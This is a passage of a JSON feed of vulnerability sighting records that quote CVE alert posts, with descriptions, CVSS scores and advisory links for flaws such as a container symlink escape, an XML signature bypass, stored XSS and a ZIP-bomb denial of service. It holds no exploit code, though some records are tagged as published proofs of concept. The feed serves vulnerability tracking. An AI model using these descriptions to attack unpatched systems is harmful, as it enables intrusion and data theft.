https://github.com/Sylius/PayPalPlugin/releases/tag/v1.7.1\n6. https://github.com/Sylius/PayPalPlugin/releases/tag/v2.0.1", "creation_timestamp": "2025-03-17T13:47:01.000000Z"}, {"uuid": "dae2e281-35ca-4273-92b6-aca55487827e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8690", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-03-14T16:37:18.925Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-03-14T16:43:58.000000Z"}, {"uuid": "79a3df3b-fdc9-48c6-a833-83b57093ba49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XFRJ-C749-JXXQ", "type": "seen", "source": "Telegram/KVWOQnBiY3Eem9HhxjtYUT7TdVna0GpQEMRBO0Jx4tvF1fc", "content": "", "creation_timestamp": "2026-01-08T17:15:40.000000Z"}, {"uuid": "e71e91da-c5e6-4048-af2d-2a6fe862a0a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W2RR-38WV-8RRP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8255", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29922\n\ud83d\udd25 CVSS Score: 9.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N)\n\ud83d\udd39 Description: kcp is a Kubernetes-like control plane for form-factors and use-cases beyond Kubernetes and container workloads. Prior to 0.26.3, the identified vulnerability allows creating or deleting an object via the APIExport VirtualWorkspace in any arbitrary target workspace for pre-existing resources. By design, this should only be allowed when the workspace owner decides to give access to an API provider by creating an APIBinding. With this vulnerability, it is possible for an attacker to create and delete objects even if none of these requirements are satisfied, i.e. even if there is no APIBinding in that workspace at all or the workspace owner has created an APIBinding, but rejected a permission claim. A fix for this issue has been identified and has been published with kcp 0.26.3 and 0.27.0.\n\ud83d\udccf Published: 2025-03-20T17:49:57.425Z\n\ud83d\udccf Modified: 2025-03-20T17:49:57.425Z\n\ud83d\udd17 References:\n1. https://github.com/kcp-dev/kcp/security/advisories/GHSA-w2rr-38wv-8rrp\n2. https://github.com/kcp-dev/kcp/pull/3338\n3. https://github.com/kcp-dev/kcp/commit/614ecbf35f11db00f65391ab6fbb1547ca8b5d38", "creation_timestamp": "2025-03-20T18:20:52.000000Z"}, {"uuid": "555c7517-3344-4e78-bfd8-095c0b2bb48d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0384", "type": "published-proof-of-concept", "source": "Telegram/Lge4_284wsR8RZQjN49TNfOaqkj39MhV6KOAFAkydmYlrvo", "content": "", "creation_timestamp": "2026-01-08T18:11:57.000000Z"}, {"uuid": "a17f839f-6e6b-4c1a-bc82-6e413b510a6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8694", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-03-14T16:37:18.925Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-03-14T16:43:58.000000Z"}, {"uuid": "8ec1350b-fca6-4234-9fe0-b4b34096e31c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9459", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-03-14T16:37:18.925Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-03-14T16:43:58.000000Z"}, {"uuid": "8b18182f-eafd-4c35-8069-6b85733b8d42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8263", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-03-14T16:37:18.925Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-03-14T16:43:58.000000Z"}, {"uuid": "94d3c565-8005-4f47-9ca5-a4a587baf43b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8428", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-03-14T16:37:18.925Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-03-14T16:43:58.000000Z"}, {"uuid": "28b9dc9e-55ba-4692-92b5-9016189a5bab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8846", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-03-14T16:37:18.925Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-03-14T16:43:58.000000Z"}, {"uuid": "3bf9f813-2563-48b5-bfe6-93251f7e66dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R8GC-QC2C-C7VH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7607", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29779\n\ud83d\udd25 CVSS Score: 5.4 (cvssV4_0, Vector: CVSS:4.0/AV:P/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Post-Quantum Secure Feldman's Verifiable Secret Sharing provides a Python implementation of Feldman's Verifiable Secret Sharing (VSS) scheme. In versions 0.7.6b0 and prior, the `secure_redundant_execution` function in feldman_vss.py attempts to mitigate fault injection attacks by executing a function multiple times and comparing results. However, several critical weaknesses exist. Python's execution environment cannot guarantee true isolation between redundant executions, the constant-time comparison implementation in Python is subject to timing variations, the randomized execution order and timing provide insufficient protection against sophisticated fault attacks, and the error handling may leak timing information about partial execution results. These limitations make the protection ineffective against targeted fault injection attacks, especially from attackers with physical access to the hardware. A successful fault injection attack could allow an attacker to bypass the redundancy check mechanisms, extract secret polynomial coefficients during share generation or verification, force the acceptance of invalid shares during verification, and/or manipulate the commitment verification process to accept fraudulent commitments. This undermines the core security guarantees of the Verifiable Secret Sharing scheme. As of time of publication, no patched versions of Post-Quantum Secure Feldman's Verifiable Secret Sharing exist, but other mitigations are available. Long-term remediation requires reimplementing the security-critical functions in a lower-level language like Rust. Short-term mitigations include deploying the software in environments with physical security controls, increasing the redundancy count (from 5 to a higher number) by modifying the source code, adding external verification of cryptographic operations when possible, considering using hardware security modules (HSMs) for key operations.\n\ud83d\udccf Published: 2025-03-14T17:24:10.215Z\n\ud83d\udccf Modified: 2025-03-14T17:24:10.215Z\n\ud83d\udd17 References:\n1. https://github.com/DavidOsipov/PostQuantum-Feldman-VSS/security/advisories/GHSA-r8gc-qc2c-c7vh\n2. https://en.wikipedia.org/wiki/Fault_attack\n3. https://eprint.iacr.org/2004/100.pdf", "creation_timestamp": "2025-03-14T17:48:53.000000Z"}, {"uuid": "08444ef5-c533-43a8-87a4-9cf29d21193e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X3M8-899R-F7C3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7619", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29775\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: xml-crypto is an XML digital signature and encryption library for Node.js. An attacker may be able to exploit a vulnerability in versions prior to 6.0.1, 3.2.1, and 2.1.6 to bypass authentication or authorization mechanisms in systems that rely on xml-crypto for verifying signed XML documents. The vulnerability allows an attacker to modify a valid signed XML message in a way that still passes signature verification checks. For example, it could be used to alter critical identity or access control attributes, enabling an attacker to escalate privileges or impersonate another user. Users of versions 6.0.0 and prior should upgrade to version 6.0.1 to receive a fix. Those who are still using v2.x or v3.x should upgrade to patched versions 2.1.6 or 3.2.1, respectively.\n\ud83d\udccf Published: 2025-03-14T17:11:05.590Z\n\ud83d\udccf Modified: 2025-03-14T17:11:05.590Z\n\ud83d\udd17 References:\n1. https://github.com/node-saml/xml-crypto/security/advisories/GHSA-x3m8-899r-f7c3\n2. https://github.com/node-saml/xml-crypto/commit/28f92218ecbb8dcbd238afa4efbbd50302aa9aed\n3. https://github.com/node-saml/xml-crypto/commit/886dc63a8b4bb5ae1db9f41c7854b171eb83aa98\n4. https://github.com/node-saml/xml-crypto/commit/8ac6118ee7978b46aa56b82cbcaa5fca58c93a07\n5. https://github.com/node-saml/xml-crypto/releases/tag/v2.1.6\n6. https://github.com/node-saml/xml-crypto/releases/tag/v3.2.1\n7. https://github.com/node-saml/xml-crypto/releases/tag/v6.0.1", "creation_timestamp": "2025-03-14T17:49:09.000000Z"}, {"uuid": "e26de53e-bf24-4c1c-b5e0-eb43dcc0fbe6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QV2W-MQ3G-73GV", "type": "seen", "source": "Telegram/YUcM_xSUavxh3En3n_ssuJOR-4_BWWaS_Uy1PKcoe9wlx00", "content": "", "creation_timestamp": "2026-01-08T17:15:57.000000Z"}, {"uuid": "2267b435-80a2-46d2-b826-b052299cfc18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5X5W-5C99-VR8H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29782\n\ud83d\udd25 CVSS Score: 6.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: WeGIA is Web manager for charitable institutions A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `adicionar_tipo_docs_atendido.php` endpoint in versions of the WeGIA application prior to 3.2.17. This vulnerability allows attackers to inject malicious scripts into the `tipo` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. Version 3.2.17 contains a patch for the issue.\n\ud83d\udccf Published: 2025-03-14T19:05:40.774Z\n\ud83d\udccf Modified: 2025-03-14T19:05:40.774Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x5w-5c99-vr8h\n2. https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/v3.2.17", "creation_timestamp": "2025-03-14T19:45:05.000000Z"}, {"uuid": "9d7c436c-20fe-453f-9f5e-157374a823c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VHV4-FH94-JM5X", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7634", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29771\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: HtmlSanitizer is a client-side HTML Sanitizer. Versions prior to 2.0.3 have a cross-site scripting vulnerability when the sanitizer is used with a `contentEditable` element to set the elements `innerHTML` to a sanitized string produced by the package. If the code is particularly crafted to abuse the code beautifier, that runs AFTER sanitation. The issue is patched in version 2.0.3.\n\ud83d\udccf Published: 2025-03-14T18:56:24.504Z\n\ud83d\udccf Modified: 2025-03-14T19:06:37.288Z\n\ud83d\udd17 References:\n1. https://github.com/jitbit/HtmlSanitizer/security/advisories/GHSA-vhv4-fh94-jm5x\n2. https://github.com/jitbit/HtmlSanitizer/commit/af6d2a78877e7277cd01c825b7fb50edb5956963", "creation_timestamp": "2025-03-14T19:45:04.000000Z"}, {"uuid": "7b0cfd74-3670-4fd4-b672-cee5ea52b32b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8522-69FH-W74X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7641", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2295\n\ud83d\udd25 CVSS Score: 3.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: EDK2 contains a vulnerability in BIOS where a user may cause an Integer Overflow or Wraparound by network means. A successful exploitation of this vulnerability may lead to denial of service.\n\ud83d\udccf Published: 2025-03-14T21:35:10.484Z\n\ud83d\udccf Modified: 2025-03-14T21:35:10.484Z\n\ud83d\udd17 References:\n1. https://github.com/tianocore/edk2/security/advisories/GHSA-8522-69fh-w74x", "creation_timestamp": "2025-03-14T21:44:50.000000Z"}, {"uuid": "8ca1ebc8-259e-42ac-961d-7f0cdc16817a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0386", "type": "published-proof-of-concept", "source": "Telegram/Lge4_284wsR8RZQjN49TNfOaqkj39MhV6KOAFAkydmYlrvo", "content": "", "creation_timestamp": "2026-01-08T18:11:57.000000Z"}, {"uuid": "8df2c0a0-a25e-415f-8087-5a815afa041c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C98H-7HP9-V9HQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7861", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29781\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: The Bare Metal Operator (BMO) implements a Kubernetes API for managing bare metal hosts in Metal3. Baremetal Operator enables users to load Secret from arbitrary namespaces upon deployment of the namespace scoped Custom Resource `BMCEventSubscription`. Prior to versions 0.8.1 and 0.9.1, an adversary Kubernetes account with only namespace level roles (e.g. a tenant controlling a namespace) may create a `BMCEventSubscription` in his authorized namespace and then load Secrets from his unauthorized namespaces to his authorized namespace via the Baremetal Operator, causing Secret Leakage. The patch makes BMO refuse to read Secrets from other namespace than where the corresponding BMH resource is. The patch does not change the `BMCEventSubscription` API in BMO, but stricter validation will fail the request at admission time. It will also prevent the controller reading such Secrets, in case the BMCES CR has already been deployed. The issue exists for all versions of BMO, and is patched in BMO releases v0.9.1 and v0.8.1. Prior upgrading to patched BMO version, duplicate any existing Secret pointed to by `BMCEventSubscription`'s `httpHeadersRef` to the same namespace where the corresponding BMH exists. After upgrade, remove the old Secrets. As a workaround, the operator can configure BMO RBAC to be namespace scoped, instead of cluster scoped, to prevent BMO from accessing Secrets from other namespaces, and/or use `WATCH_NAMESPACE` configuration option to limit BMO to single namespace.\n\ud83d\udccf Published: 2025-03-17T21:37:31.856Z\n\ud83d\udccf Modified: 2025-03-17T21:37:31.856Z\n\ud83d\udd17 References:\n1. https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-c98h-7hp9-v9hq\n2. https://github.com/metal3-io/baremetal-operator/pull/2321\n3. https://github.com/metal3-io/baremetal-operator/pull/2322\n4. https://github.com/metal3-io/baremetal-operator/commit/19f8443b1fe182f76dd81b43122e8dd102f8b94c\n5. https://github.com/metal3-io/metal3-docs/blob/main/design/baremetal-operator/bmc-events.md", "creation_timestamp": "2025-03-17T21:47:25.000000Z"}, {"uuid": "fe4a3a0c-0caa-4ee0-9600-77529ef683a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ9G-9VFC-CFQ9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8080", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30153\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: kin-openapi is a Go project for handling OpenAPI files. Prior to 0.131.0, when validating a request with a multipart/form-data schema, if the OpenAPI schema allows it, an attacker can upload a crafted ZIP file (e.g., a ZIP bomb), causing the server to consume all available system memory. The root cause comes from the ZipFileBodyDecoder, which is registered automatically by the module (contrary to what the documentation says). This vulnerability is fixed in 0.131.0.\n\ud83d\udccf Published: 2025-03-19T16:03:26.947Z\n\ud83d\udccf Modified: 2025-03-19T16:03:26.947Z\n\ud83d\udd17 References:\n1. https://github.com/getkin/kin-openapi/security/advisories/GHSA-wq9g-9vfc-cfq9\n2. https://github.com/getkin/kin-openapi/commit/67f0b233ffc01332f7d993f79490fbea5f4455f1\n3. https://github.com/getkin/kin-openapi/blob/6da871e0e170b7637eb568c265c08bc2b5d6e7a3/openapi3filter/req_resp_decoder.go#L1275\n4. https://github.com/getkin/kin-openapi/blob/6da871e0e170b7637eb568c265c08bc2b5d6e7a3/openapi3filter/req_resp_decoder.go#L1523\n5. https://github.com/getkin/kin-openapi?tab=readme-ov-file#custom-content-type-for-body-of-http-requestresponse", "creation_timestamp": "2025-03-19T16:17:59.000000Z"}, {"uuid": "a7964534-56f5-4162-9fdf-4ee053241c35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-265R-HFXG-FHMG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7865", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: 